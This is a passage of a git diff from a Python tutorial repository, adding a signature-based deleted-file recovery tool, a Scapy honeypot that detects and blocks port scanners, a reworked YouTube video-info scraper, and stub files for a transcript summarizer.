+                self.timeout_reached = True
+            
+            # Set the timeout
+            signal.signal(signal.SIGALRM, timeout_handler)
+            signal.alarm(int(self.timeout_minutes * 60))
+    
+    def get_device_size(self):
+        """Get the size of the device or file"""
+        if os.path.isfile(self.source):
+            # Regular file
+            return os.path.getsize(self.source)
+        else:
+            # Block device
+            try:
+                # Try using blockdev command (Linux)
+                result = subprocess.run(['blockdev', '--getsize64', self.source], 
+                                      capture_output=True, text=True, check=True)
+                return int(result.stdout.strip())
+            except (subprocess.SubprocessError, FileNotFoundError):
+                try:
+                    # Try using ioctl (requires root)
+                    import fcntl
+                    with open(self.source, 'rb') as fd:
+                        # BLKGETSIZE64 = 0x80081272
+                        buf = bytearray(8)
+                        fcntl.ioctl(fd, 0x80081272, buf)
+                        return struct.unpack('L', buf)[0]
+                except:
+                    # Last resort: try to seek to the end
+                    try:
+                        with open(self.source, 'rb') as fd:
+                            fd.seek(0, 2)  # Seek to end
+                            return fd.tell()
+                    except:
+                        self.logger.warning("Could not determine device size. Using fallback size.")
+                        # Fallback to a reasonable size for testing
+                        return 1024 * 1024 * 1024  # 1GB
+    
+    def scan_device(self):
+        """Scan the device for deleted files"""
+        self.logger.info(f"Starting scan of {self.source}")
+        self.logger.info(f"Looking for file types: {', '.join(self.file_types)}")
+        
+        try:
+            # Get device size
+            device_size = self.get_device_size()
+            self.logger.info(f"Device size: {self._format_size(device_size)}")
+            
+            # Set up timeout if specified
+            if self.timeout_minutes:
+                self._setup_timeout()
+                self.logger.info(f"Timeout set for {self.timeout_minutes} minutes")
+            
+            with open(self.source, 'rb', buffering=0) as device:  # buffering=0 for direct I/O
+                self._scan_device_data(device, device_size)
+                
+        except (IOError, OSError) as e:
+            self.logger.error(f"Error accessing source: {e}")
+            return False
+        
+        self._print_summary()
+        return True
+    
+    def _scan_device_data(self, device, device_size):
+        """Scan the device data for file signatures"""
+        position = 0
+        
+        # Limit scan size if specified
+        if self.max_scan_size and self.max_scan_size < device_size:
+            self.logger.info(f"Limiting scan to first {self._format_size(self.max_scan_size)} of device")
+            device_size = self.max_scan_size
+        
+        # Create subdirectories for each file type
+        for file_type in self.file_types:
+            (self.output_dir / file_type).mkdir(exist_ok=True)
+        
+        scan_start_time = time.time()
+        last_progress_time = scan_start_time
+        
+        # Read the device in blocks
+        while position < device_size:
+            # Check if timeout reached
+            if self.timeout_reached:
+                self.logger.warning("Stopping scan due to timeout")
+                break
+                
+            try:
+                # Seek to position first
+                device.seek(position)
+                
+                # Read a block of data
+                data = device.read(self.block_size)
+                if not data:
+                    break
+                    
+                self.stats['bytes_scanned'] += len(data)
+                
+                # Check for file signatures in this block
+                for file_type in self.file_types:
+                    signatures = FILE_SIGNATURES.get(file_type, [])
+                    
+                    for signature in signatures:
+                        sig_pos = data.find(signature)
+                        
+                        if sig_pos != -1:
+                            # Found a file signature, try to recover the file
+                            absolute_pos = position + sig_pos
+                            device.seek(absolute_pos)
+                            
+                            self.logger.debug(f"Found {file_type} signature at position {absolute_pos}")
+                            
+                            # Recover the file
+                            if self._recover_file(device, file_type, absolute_pos):
+                                self.stats['total_files_recovered'] += 1
+                                self.stats['recovered_by_type'][file_type] += 1
+                            else:
+                                self.stats['false_positives'] += 1
+                            
+                            # Reset position to continue scanning
+                            device.seek(position + self.block_size)
+                
+                # Update position and show progress
+                position += self.block_size
+                current_time = time.time()
+                
+                # Show progress every 5MB or 10 seconds, whichever comes first
+                if (position % (5 * 1024 * 1024) == 0) or (current_time - last_progress_time >= 10):
+                    percent = (position / device_size) * 100 if device_size > 0 else 0
+                    elapsed = current_time - self.stats['start_time']
+                    
+                    # Calculate estimated time remaining
+                    if position > 0 and device_size > 0:
+                        bytes_per_second = position / elapsed if elapsed > 0 else 0
+                        remaining_bytes = device_size - position
+                        eta_seconds = remaining_bytes / bytes_per_second if bytes_per_second > 0 else 0
+                        eta_str = str(timedelta(seconds=int(eta_seconds)))
+                    else:
+                        eta_str = "unknown"
+                    
+                    self.logger.info(f"Progress: {percent:.2f}% ({self._format_size(position)} / {self._format_size(device_size)}) - "
+                                    f"{self.stats['total_files_recovered']} files recovered - "
+                                    f"Elapsed: {timedelta(seconds=int(elapsed))} - ETA: {eta_str}")
+                    last_progress_time = current_time
+                    
+            except Exception as e:
+                self.logger.error(f"Error reading at position {position}: {e}")
+                position += self.block_size  # Skip this block and continue
+    
+    def _validate_file_content(self, data, file_type):
+        """
+        Additional validation to reduce false positives
+        
+        Args:
+            data: File data to validate
+            file_type: Type of file to validate
+            
+        Returns:
+            bool: True if file content appears valid
+        """
+        # Check minimum size
+        if len(data) < 100:
+            return False
+            
+        # Check for validation patterns
+        patterns = VALIDATION_PATTERNS.get(file_type, [])
+        if patterns:
+            for pattern in patterns:
+                if pattern in data:
+                    return True
+            return False  # None of the patterns were found
+            
+        # For file types without specific validation patterns
+        return True
+    
+    def _recover_file(self, device, file_type, start_position):
+        """
+        Recover a file of the given type starting at the given position
+        
+        Args:
+            device: Open file handle to the device
+            file_type: Type of file to recover
+            start_position: Starting position of the file
+            
+        Returns:
+            bool: True if file was recovered successfully
+        """
+        max_size = MAX_FILE_SIZES.get(file_type, 10 * 1024 * 1024)  # Default to 10MB
+        trailer = FILE_TRAILERS.get(file_type)
+        
+        # Generate a unique filename
+        filename = f"{file_type}_{start_position}_{int(time.time())}_{binascii.hexlify(os.urandom(4)).decode()}.{file_type}"
+        output_path = self.output_dir / file_type / filename
+        
+        if self.skip_existing and output_path.exists():
+            self.logger.debug(f"Skipping existing file: {output_path}")
+            return False
+        
+        # Save the current position to restore later
+        current_pos = device.tell()
+        
+        try:
+            # Seek to the start of the file
+            device.seek(start_position)
+            
+            # Read the file data
+            if trailer and self.deep_scan:
+                # If we know the trailer and deep scan is enabled, read until trailer
+                file_data = self._read_until_trailer(device, trailer, max_size)
+            else:
+                # Otherwise, use heuristics to determine file size
+                file_data = self._read_file_heuristic(device, file_type, max_size)
+            
+            if not file_data or len(file_data) < 100:  # Ignore very small files
+                return False
+                
+            # Additional validation to reduce false positives
+            if not self._validate_file_content(file_data, file_type):
+                self.logger.debug(f"Skipping invalid {file_type} file at position {start_position}")
+                return False
+                
+            # Write the recovered file
+            with open(output_path, 'wb') as f:
+                f.write(file_data)
+                
+            self.logger.info(f"Recovered {file_type} file: {filename} ({self._format_size(len(file_data))})")
+            return True
+            
+        except Exception as e:
+            self.logger.error(f"Error recovering file at position {start_position}: {e}")
+            return False
+        finally:
+            # Restore the original position
+            try:
+                device.seek(current_pos)
+            except:
+                pass  # Ignore seek errors in finally block
+    
+    def _read_until_trailer(self, device, trailer, max_size):
+        """Read data until a trailer signature is found or max size is reached"""
+        buffer = bytearray()
+        chunk_size = 4096
+        
+        while len(buffer) < max_size:
+            try:
+                chunk = device.read(chunk_size)
+                if not chunk:
+                    break
+                    
+                buffer.extend(chunk)
+                
+                # Check if trailer is in the buffer
+                trailer_pos = buffer.find(trailer, max(0, len(buffer) - len(trailer) - chunk_size))
+                if trailer_pos != -1:
+                    # Found trailer, return data up to and including the trailer
+                    return buffer[:trailer_pos + len(trailer)]
+            except Exception as e:
+                self.logger.error(f"Error reading chunk: {e}")
+                break
+        
+        # If we reached max size without finding a trailer, return what we have
+        return buffer if len(buffer) > 100 else None
+    
+    def _read_file_heuristic(self, device, file_type, max_size):
+        """
+        Use heuristics to determine file size when trailer is unknown
+        This is a simplified approach - real tools use more sophisticated methods
+        """
+        buffer = bytearray()
+        chunk_size = 4096
+        valid_chunks = 0
+        invalid_chunks = 0
+        
+        # For Office documents and ZIP files, read a larger initial chunk to validate
+        initial_chunk_size = 16384 if file_type in ['docx', 'xlsx', 'pptx', 'zip'] else chunk_size
+        
+        # Read initial chunk for validation
+        initial_chunk = device.read(initial_chunk_size)
+        if not initial_chunk:
+            return None
+            
+        buffer.extend(initial_chunk)
+        
+        # For Office documents, check if it contains required elements
+        if file_type in ['docx', 'xlsx', 'pptx', 'zip']:
+            # Basic validation for Office Open XML files
+            if file_type == 'docx' and b'word/' not in initial_chunk:
+                return None
+            if file_type == 'xlsx' and b'xl/' not in initial_chunk:
+                return None
+            if file_type == 'pptx' and b'ppt/' not in initial_chunk:
+                return None
+            if file_type == 'zip' and b'PK\x01\x02' not in initial_chunk:
+                return None
+        
+        # Continue reading chunks
+        while len(buffer) < max_size:
+            try:
+                chunk = device.read(chunk_size)
+                if not chunk:
+                    break
+                    
+                buffer.extend(chunk)
+                
+                # Simple heuristic: for binary files, check if chunk contains too many non-printable characters
+                # This is a very basic approach and would need to be refined for real-world use
+                if file_type in ['jpg', 'png', 'gif', 'pdf', 'zip', 'docx', 'xlsx', 'pptx', 'mp3', 'mp4', 'avi']:
+                    # For binary files, we continue reading until we hit max size or end of device
+                    valid_chunks += 1
+                    
+                    # For ZIP-based formats, check for corruption
+                    if file_type in ['zip', 'docx', 'xlsx', 'pptx'] and b'PK' not in chunk and valid_chunks > 10:
+                        # If we've read several chunks and don't see any more PK signatures, we might be past the file
+                        invalid_chunks += 1
+                    
+                else:
+                    # For text files, we could check for text validity
+                    printable_ratio = sum(32 <= b <= 126 or b in (9, 10, 13) for b in chunk) / len(chunk)
+                    if printable_ratio < 0.7:  # If less than 70% printable characters
+                        invalid_chunks += 1
+                    else:
+                        valid_chunks += 1
+                        
+                # If we have too many invalid chunks in a row, stop
+                if invalid_chunks > 3:
+                    return buffer[:len(buffer) - (invalid_chunks * chunk_size)]
+            except Exception as e:
+                self.logger.error(f"Error reading chunk in heuristic: {e}")
+                break
+        
+        return buffer
+    
+    def _format_size(self, size_bytes):
+        """Format size in bytes to a human-readable string"""
+        for unit in ['B', 'KB', 'MB', 'GB', 'TB']:
+            if size_bytes < 1024 or unit == 'TB':
+                return f"{size_bytes:.2f} {unit}"
+            size_bytes /= 1024
+    
+    def _print_summary(self):
+        """Print a summary of the recovery operation"""
+        elapsed = time.time() - self.stats['start_time']
+        
+        self.logger.info("=" * 50)
+        self.logger.info("Recovery Summary")
+        self.logger.info("=" * 50)
+        self.logger.info(f"Total files recovered: {self.stats['total_files_recovered']}")
+        self.logger.info(f"False positives detected and skipped: {self.stats['false_positives']}")
+        self.logger.info(f"Total data scanned: {self._format_size(self.stats['bytes_scanned'])}")
+        self.logger.info(f"Time elapsed: {timedelta(seconds=int(elapsed))}")
+        self.logger.info("Files recovered by type:")
+        
+        for file_type, count in self.stats['recovered_by_type'].items():
+            if count > 0:
+                self.logger.info(f"  - {file_type}: {count}")
+        
+        if self.timeout_reached:
+            self.logger.info("Note: Scan was stopped due to timeout")
+            
+        self.logger.info("=" * 50)
+
+
+def main():
+    """Main function to parse arguments and run the recovery tool"""
+    parser = argparse.ArgumentParser(description='File Recovery Tool - Recover deleted files from storage devices')
+    
+    parser.add_argument('source', help='Source device or directory to recover files from (e.g., /dev/sdb, /media/usb)')
+    parser.add_argument('output', help='Directory to save recovered files')
+    
+    parser.add_argument('-t', '--types', nargs='+', choices=FILE_SIGNATURES.keys(), default=None,
+                        help='File types to recover (default: all supported types)')
+    
+    parser.add_argument('-d', '--deep-scan', action='store_true',
+                        help='Perform a deep scan (slower but more thorough)')
+    
+    parser.add_argument('-b', '--block-size', type=int, default=512,
+                        help='Block size for reading data (default: 512 bytes)')
+    
+    parser.add_argument('-v', '--verbose', action='store_true',
+                        help='Enable verbose output')
+    
+    parser.add_argument('-q', '--quiet', action='store_true',
+                        help='Suppress all output except errors')
+    
+    parser.add_argument('--no-skip', action='store_true',
+                        help='Do not skip existing files in output directory')
+    
+    parser.add_argument('--max-size', type=int, 
+                        help='Maximum size to scan in MB (e.g., 1024 for 1GB)')
+    
+    parser.add_argument('--timeout', type=int, default=None,
+                        help='Stop scanning after specified minutes')
+    
+    args = parser.parse_args()
+    
+    # Set logging level based on verbosity
+    if args.quiet:
+        log_level = logging.ERROR
+    elif args.verbose:
+        log_level = logging.DEBUG
+    else:
+        log_level = logging.INFO
+    
+    # Convert max size from MB to bytes if specified
+    max_scan_size = args.max_size * 1024 * 1024 if args.max_size else None
+    
+    # Create and run the recovery tool
+    recovery_tool = FileRecoveryTool(
+        source=args.source,
+        output_dir=args.output,
+        file_types=args.types,
+        deep_scan=args.deep_scan,
+        block_size=args.block_size,
+        log_level=log_level,
+        skip_existing=not args.no_skip,
+        max_scan_size=max_scan_size,
+        timeout_minutes=args.timeout
+    )
+    
+    try:
+        recovery_tool.scan_device()
+    except KeyboardInterrupt:
+        print("\nRecovery process interrupted by user.")
+        recovery_tool._print_summary()
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()
diff --git a/scapy/honeypot-defense-system/README.md b/scapy/honeypot-defense-system/README.md
new file mode 100644
index 00000000..82c72f3b
--- /dev/null
+++ b/scapy/honeypot-defense-system/README.md
@@ -0,0 +1,4 @@
+# [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system)
+Requires Linux or Windows with WSL, Python 3.8+, and Scapy. Install Scapy using `pip install scapy` or refer to the [Scapy installation guide](https://scapy.readthedocs.io/en/latest/installation.html) for detailed instructions.
+
+Read the full article on [ThePythonCode](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system) for a step-by-step tutorial on building a honeypot defense system using Python and Scapy.
\ No newline at end of file
diff --git a/scapy/honeypot-defense-system/block_port_scan.py b/scapy/honeypot-defense-system/block_port_scan.py
new file mode 100644
index 00000000..43c23e61
--- /dev/null
+++ b/scapy/honeypot-defense-system/block_port_scan.py
@@ -0,0 +1,230 @@
+#!/usr/bin/env python3
+"""
+Honeypot Defense System
+Detects port scanners using decoy ports and blocks malicious IPs
+"""
+
+from scapy.all import *
+from datetime import datetime
+import sys
+
+# ==================== NETWORK INTERFACE ====================
+conf.iface = "enp0s8"  # Specify your network interface
+
+# ==================== CONFIGURATION ====================
+DEFENDER_IP = "192.168.56.101"  # Change this to your Ubuntu IP
+
+# Three-tier port system
+PUBLIC_PORTS = [80]  # Open to everyone (realistic services)
+HONEYPOT_PORTS = [8080, 8443, 3389, 3306]  # Decoy ports to trap attackers
+PROTECTED_PORTS = [443, 53, 22, 5432]  # Hidden unless IP is allowed
+
+ALLOWED_IPS = [
+    "192.168.1.100",  # Add your Kali IP here
+    "192.168.1.1",    # Add other trusted IPs
+]
+MAX_ATTEMPTS = 3  # Block after this many honeypot accesses (changeable)
+LOG_FILE = "honeypot_logs.txt"
+
+# ==================== GLOBALS ====================
+blocked_ips = []
+attempt_tracker = {}  # {IP: attempt_count}
+total_scans = 0
+total_blocks = 0
+
+# ==================== HELPER FUNCTIONS ====================
+
+def log_message(message, color_code=None):
+    """Print and save log messages with timestamps"""
+    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+    log_entry = f"[{timestamp}] {message}"
+    
+    # Color output for terminal
+    if color_code:
+        print(f"\033[{color_code}m{log_entry}\033[0m")
+    else:
+        print(log_entry)
+    
+    # Save to file
+    with open(LOG_FILE, "a") as f:
+        f.write(log_entry + "\n")
+
+
+def is_allowed_ip(ip):
+    """Check if IP is in the allowlist"""
+    return ip in ALLOWED_IPS
+
+
+def track_attempt(ip):
+    """Track honeypot access attempts and return current count"""
+    if ip not in attempt_tracker:
+        attempt_tracker[ip] = 0
+    attempt_tracker[ip] += 1
+    return attempt_tracker[ip]
+
+
+def block_ip(ip):
+    """Add IP to blocklist"""
+    global total_blocks
+    if ip not in blocked_ips:
+        blocked_ips.append(ip)
+        total_blocks += 1
+        log_message(f"[!] IP BLOCKED: {ip}", "91")  # Red
+
+
+def create_response(packet, flags):
+    """Create a TCP response packet"""
+    if packet.haslayer(IP):
+        response = (
+            Ether(src=packet[Ether].dst, dst=packet[Ether].src) /
+            IP(src=packet[IP].dst, dst=packet[IP].src) /
+            TCP(
+                sport=packet[TCP].dport,
+                dport=packet[TCP].sport,
+                flags=flags,
+                seq=0,
+                ack=packet[TCP].seq + 1
+            )
+        )
+    else:  # IPv6
+        response = (
+            Ether(src=packet[Ether].dst, dst=packet[Ether].src) /
+            IPv6(src=packet[IPv6].dst, dst=packet[IPv6].src) /
+            TCP(
+                sport=packet[TCP].dport,
+                dport=packet[TCP].sport,
+                flags=flags,
+                seq=0,
+                ack=packet[TCP].seq + 1
+            )
+        )
+    return response
+
+
+# ==================== MAIN PACKET HANDLER ====================
+
+def handle_packet(packet):
+    """Process incoming TCP packets with three-tier security"""
+    global total_scans
+    
+    # Only process SYN packets (connection attempts)
+    if packet[TCP].flags != "S":
+        return
+    
+    # Extract source IP and destination port
+    if packet.haslayer(IP):
+        source_ip = packet[IP].src
+    else:
+        source_ip = packet[IPv6].src
+    
+    dest_port = packet[TCP].dport
+    total_scans += 1
+    
+    # ===== CHECK IF IP IS BLOCKED FIRST =====
+    if source_ip in blocked_ips:
+        # Drop packet silently - no response to show as "filtered" in nmap
+        log_message(f"[-] Blocked IP {source_ip} denied access to port {dest_port}", "90")
+        return  # Don't send any response - this makes it appear "filtered"
+    
+    # ===== PUBLIC PORTS (open to everyone) =====
+    if dest_port in PUBLIC_PORTS:
+        # Let the real service handle it - no response needed from script
+        log_message(f"[+] Public port {dest_port} accessed by {source_ip}", "94")  # Blue
+        return
+    
+    # ===== HONEYPOT PORTS (trap for attackers) =====
+    if dest_port in HONEYPOT_PORTS:
+        # Always respond with SYN-ACK to appear "open"
+        response = create_response(packet, "SA")
+        sendp(response, verbose=False)
+        
+        # Check if IP is allowed
+        if is_allowed_ip(source_ip):
+            log_message(
+                f"[+] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+                f"[!]    Status: TRUSTED IP (allowed)",
+                "92"  # Green
+            )
+        else:
+            # Track attempts for unknown IPs
+            attempts = track_attempt(source_ip)
+            log_message(
+                f"[!] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+                f"[-]    Status: UNKNOWN IP - POTENTIAL ATTACKER\n"
+                f"[!]    Strike {attempts}/{MAX_ATTEMPTS}",
+                "93"  # Yellow
+            )
+            
+            # Block after max attempts
+            if attempts >= MAX_ATTEMPTS:
+                block_ip(source_ip)
+        return
+    
+    # ===== PROTECTED PORTS (only allowed IPs) =====
+    if dest_port in PROTECTED_PORTS:
+        if is_allowed_ip(source_ip):
+            # Respond with SYN-ACK for allowed IPs
+            response = create_response(packet, "SA")
+            sendp(response, verbose=False)
+            log_message(f"[!] Protected port {dest_port} accessed by TRUSTED IP {source_ip}", "92")
+        else:
+            # Drop packet silently for unknown IPs (appears filtered)
+            log_message(f"[!] Protected port {dest_port} hidden from {source_ip}", "93")
+        return
+    
+    # ===== OTHER PORTS (default behavior - drop silently) =====
+    # Unknown ports are silently dropped (appear filtered)
+
+
+# ==================== STARTUP & MAIN ====================
+
+def print_banner():
+    """Display startup information"""
+    print("\n" + "="*60)
+    print("[+]  HONEYPOT DEFENSE SYSTEM ACTIVE")
+    print("="*60)
+    print(f"Defending IP: {DEFENDER_IP}")
+    print(f"Public Ports (open to all): {PUBLIC_PORTS}")
+    print(f"Honeypot Ports (trap): {HONEYPOT_PORTS}")
+    print(f"Protected Ports (allowed IPs only): {PROTECTED_PORTS}")
+    print(f"Allowed IPs: {ALLOWED_IPS}")
+    print(f"Block Threshold: {MAX_ATTEMPTS} attempts")
+    print(f"Log File: {LOG_FILE}")
+    print("="*60)
+    print("Monitoring traffic... Press Ctrl+C to stop\n")
+
+
+def print_summary():
+    """Display statistics on exit"""
+    print("\n" + "="*60)
+    print("[+] SESSION SUMMARY")
+    print("="*60)
+    print(f"Total scans detected: {total_scans}")
+    print(f"IPs blocked: {total_blocks}")
+    print(f"Current blocklist: {blocked_ips if blocked_ips else 'None'}")
+    print("="*60 + "\n")
+
+
+def main():
+    """Main execution"""
+    print_banner()
+    
+    # Create BPF filter
+    packet_filter = f"dst host {DEFENDER_IP} and tcp"
+    
+    try:
+        # Start sniffing
+        sniff(filter=packet_filter, prn=handle_packet, store=False)
+    except KeyboardInterrupt:
+        print("\n\n[!] Stopping honeypot defense...")
+        print_summary()
+        sys.exit(0)
+
+
+if __name__ == "__main__":
+    # Check for root privileges
+    if os.geteuid() != 0:
+        print("[!] This script requires root privileges. Run with: sudo python3 honeypot_defender.py")
+        sys.exit(1)
+    
+    main()
diff --git a/scapy/honeypot-defense-system/requirements.txt b/scapy/honeypot-defense-system/requirements.txt
new file mode 100644
index 00000000..93b351f4
--- /dev/null
+++ b/scapy/honeypot-defense-system/requirements.txt
@@ -0,0 +1 @@
+scapy
\ No newline at end of file
diff --git a/web-scraping/youtube-extractor/extract_video_info.py b/web-scraping/youtube-extractor/extract_video_info.py
index 042ce4f8..bed184b0 100644
--- a/web-scraping/youtube-extractor/extract_video_info.py
+++ b/web-scraping/youtube-extractor/extract_video_info.py
@@ -1,92 +1,150 @@
-from requests_html import HTMLSession
-from bs4 import BeautifulSoup as bs
+import requests
+from bs4 import BeautifulSoup
 import re
 import json
-
-# init session
-session = HTMLSession()
-
+import argparse
 
 def get_video_info(url):
-    # download HTML code
-    response = session.get(url)
-    # execute Javascript
-    response.html.render(timeout=60)
-    # create beautiful soup object to parse HTML
-    soup = bs(response.html.html, "html.parser")
-    # open("index.html", "w").write(response.html.html)
-    # initialize the result
-    result = {}
-    # video title
-    result["title"] = soup.find("meta", itemprop="name")['content']
-    # video views
-    result["views"] = soup.find("meta", itemprop="interactionCount")['content']
-    # video description
-    result["description"] = soup.find("meta", itemprop="description")['content']
-    # date published
-    result["date_published"] = soup.find("meta", itemprop="datePublished")['content']
-    # get the duration of the video
-    result["duration"] = soup.find("span", {"class": "ytp-time-duration"}).text
-    # get the video tags
-    result["tags"] = ', '.join([ meta.attrs.get("content") for meta in soup.find_all("meta", {"property": "og:video:tag"}) ])
-
-    # Additional video and channel information (with help from: https://stackoverflow.com/a/68262735)
-    data = re.search(r"var ytInitialData = ({.*?});", soup.prettify()).group(1)
-    data_json = json.loads(data)
-    videoPrimaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][0]['videoPrimaryInfoRenderer']
-    videoSecondaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][1]['videoSecondaryInfoRenderer']
-    # number of likes
-    likes_label = videoPrimaryInfoRenderer['videoActions']['menuRenderer']['topLevelButtons'][0]['toggleButtonRenderer']['defaultText']['accessibility']['accessibilityData']['label'] # "No likes" or "###,### likes"
-    likes_str = likes_label.split(' ')[0].replace(',','')
-    result["likes"] = '0' if likes_str == 'No' else likes_str
-    # number of likes (old way) doesn't always work
-    # text_yt_formatted_strings = soup.find_all("yt-formatted-string", {"id": "text", "class": "ytd-toggle-button-renderer"})
-    # result["likes"] = ''.join([ c for c in text_yt_formatted_strings[0].attrs.get("aria-label") if c.isdigit() ])
-    # result["likes"] = 0 if result['likes'] == '' else int(result['likes'])
-    # number of dislikes - YouTube does not publish this anymore...
-    # result["dislikes"] = ''.join([ c for c in text_yt_formatted_strings[1].attrs.get("aria-label") if c.isdigit() ])	
-    # result["dislikes"] = '0' if result['dislikes'] == '' else result['dislikes']
-    result['dislikes'] = 'UNKNOWN'
-    # channel details
-    channel_tag = soup.find("meta", itemprop="channelId")['content']
-    # channel name
-    channel_name = soup.find("span", itemprop="author").next.next['content']
-    # channel URL
-    # channel_url = soup.find("span", itemprop="author").next['href']
-    channel_url = f"https://www.youtube.com/{channel_tag}"
-    # number of subscribers as str
-    channel_subscribers = videoSecondaryInfoRenderer['owner']['videoOwnerRenderer']['subscriberCountText']['accessibility']['accessibilityData']['label']
-    # channel details (old way)
-    # channel_tag = soup.find("yt-formatted-string", {"class": "ytd-channel-name"}).find("a")
-    # # channel name (old way)
-    # channel_name = channel_tag.text
-    # # channel URL (old way)
-    # channel_url = f"https://www.youtube.com{channel_tag['href']}"
-    # number of subscribers as str (old way)
-    # channel_subscribers = soup.find("yt-formatted-string", {"id": "owner-sub-count"}).text.strip()
-    result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
-    return result
+    """
+    Extract video information from YouTube using modern approach
+    """
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
+    }
+    
+    try:
+        # Download HTML code
+        response = requests.get(url, headers=headers)
+        response.raise_for_status()
+        
+        # Create beautiful soup object to parse HTML
+        soup = BeautifulSoup(response.text, "html.parser")
+        
+        # Initialize the result
+        result = {}
+        
+        # Extract ytInitialData which contains all the video information
+        data_match = re.search(r'var ytInitialData = ({.*?});', response.text)
+        if not data_match:
+            raise Exception("Could not find ytInitialData in page")
+            
+        data_json = json.loads(data_match.group(1))
+        
+        # Get the main content sections
+        contents = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents']
+        
+        # Extract video information from videoPrimaryInfoRenderer
+        if 'videoPrimaryInfoRenderer' in contents[0]:
+            primary = contents[0]['videoPrimaryInfoRenderer']
+            
+            # Video title
+            result["title"] = primary['title']['runs'][0]['text']
+            
+            # Video views
+            result["views"] = primary['viewCount']['videoViewCountRenderer']['viewCount']['simpleText']
+            
+            # Date published
+            result["date_published"] = primary['dateText']['simpleText']
+        
+        # Extract channel information from videoSecondaryInfoRenderer
+        secondary = None
+        if 'videoSecondaryInfoRenderer' in contents[1]:
+            secondary = contents[1]['videoSecondaryInfoRenderer']
+            owner = secondary['owner']['videoOwnerRenderer']
+            
+            # Channel name
+            channel_name = owner['title']['runs'][0]['text']
+            
+            # Channel ID
+            channel_id = owner['navigationEndpoint']['browseEndpoint']['browseId']
+            
+            # Channel URL - FIXED with proper /channel/ path
+            channel_url = f"https://www.youtube.com/channel/{channel_id}"
+            
+            # Number of subscribers
+            channel_subscribers = owner['subscriberCountText']['accessibility']['accessibilityData']['label']
+            
+            result['channel'] = {
+                'name': channel_name, 
+                'url': channel_url, 
+                'subscribers': channel_subscribers
+            }
+        
+        # Extract video description
+        if secondary and 'attributedDescription' in secondary:
+            description_runs = secondary['attributedDescription']['content']
+            result["description"] = description_runs
+        else:
+            result["description"] = "Description not available"
+        
+        # Try to extract video duration from player overlay
+        # This is a fallback approach since the original method doesn't work
+        duration_match = re.search(r'"approxDurationMs":"(\d+)"', response.text)
+        if duration_match:
+            duration_ms = int(duration_match.group(1))
+            minutes = duration_ms // 60000
+            seconds = (duration_ms % 60000) // 1000
+            result["duration"] = f"{minutes}:{seconds:02d}"
+        else:
+            result["duration"] = "Duration not available"
+        
+        # Extract video tags if available
+        video_tags = []
+        if 'keywords' in data_json.get('metadata', {}).get('videoMetadataRenderer', {}):
+            video_tags = data_json['metadata']['videoMetadataRenderer']['keywords']
+        result["tags"] = ', '.join(video_tags) if video_tags else "No tags available"
+        
+        # Extract likes (modern approach)
+        result["likes"] = "Likes count not available"
+        result["dislikes"] = "UNKNOWN"  # YouTube no longer shows dislikes
+        
+        # Try to find likes in the new structure
+        for content in contents:
+            if 'compositeVideoPrimaryInfoRenderer' in content:
+                composite = content['compositeVideoPrimaryInfoRenderer']
+                if 'likeButton' in composite:
+                    like_button = composite['likeButton']
+                    if 'toggleButtonRenderer' in like_button:
+                        toggle = like_button['toggleButtonRenderer']
+                        if 'defaultText' in toggle:
+                            default_text = toggle['defaultText']
+                            if 'accessibility' in default_text:
+                                accessibility = default_text['accessibility']
+                                if 'accessibilityData' in accessibility:
+                                    label = accessibility['accessibilityData']['label']
+                                    if 'like' in label.lower():
+                                        result["likes"] = label
+        
+        return result
+        
+    except Exception as e:
+        raise Exception(f"Error extracting video info: {str(e)}")
 
 if __name__ == "__main__":
-    import argparse
     parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
     parser.add_argument("url", help="URL of the YouTube video")
 
     args = parser.parse_args()
+    
     # parse the video URL from command line
     url = args.url
     
-    data = get_video_info(url)
+    try:
+        data = get_video_info(url)
 
-    # print in nice format
-    print(f"Title: {data['title']}")
-    print(f"Views: {data['views']}")
-    print(f"Published at: {data['date_published']}")
-    print(f"Video Duration: {data['duration']}")
-    print(f"Video tags: {data['tags']}")
-    print(f"Likes: {data['likes']}")
-    print(f"Dislikes: {data['dislikes']}")
-    print(f"\nDescription: {data['description']}\n")
-    print(f"\nChannel Name: {data['channel']['name']}")
-    print(f"Channel URL: {data['channel']['url']}")
-    print(f"Channel Subscribers: {data['channel']['subscribers']}")
+        # print in nice format
+        print(f"Title: {data['title']}")
+        print(f"Views: {data['views']}")
+        print(f"Published at: {data['date_published']}")
+        print(f"Video Duration: {data['duration']}")
+        print(f"Video tags: {data['tags']}")
+        print(f"Likes: {data['likes']}")
+        print(f"Dislikes: {data['dislikes']}")
+        print(f"\nDescription: {data['description']}\n")
+        print(f"\nChannel Name: {data['channel']['name']}")
+        print(f"Channel URL: {data['channel']['url']}")
+        print(f"Channel Subscribers: {data['channel']['subscribers']}")
+        
+    except Exception as e:
+        print(f"Error: {e}")
+        print("\nNote: YouTube frequently changes its structure, so this script may need updates.")
\ No newline at end of file
diff --git a/web-scraping/youtube-transcript-summarizer/README.md b/web-scraping/youtube-transcript-summarizer/README.md
new file mode 100644
index 00000000..a3df25a0
--- /dev/null
+++ b/web-scraping/youtube-transcript-summarizer/README.md
@@ -0,0 +1 @@
+# [YouTube Video Transcription Summarization with Python](https://thepythoncode.com/article/youtube-video-transcription-and-summarization-with-python)
\ No newline at end of file
diff --git a/web-scraping/youtube-transcript-summarizer/requirements.txt b/web-scraping/youtube-transcript-summarizer/requirements.txt
new file mode 100644
index 00000000..865ee3b5
--- /dev/null
+++ b/web-scraping/youtube-transcript-summarizer/requirements.txt
@@ -0,0 +1,5 @@
+nltk
+pytube
+youtube_transcript_api
+colorama
+openai
diff --git a/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
new file mode 100644
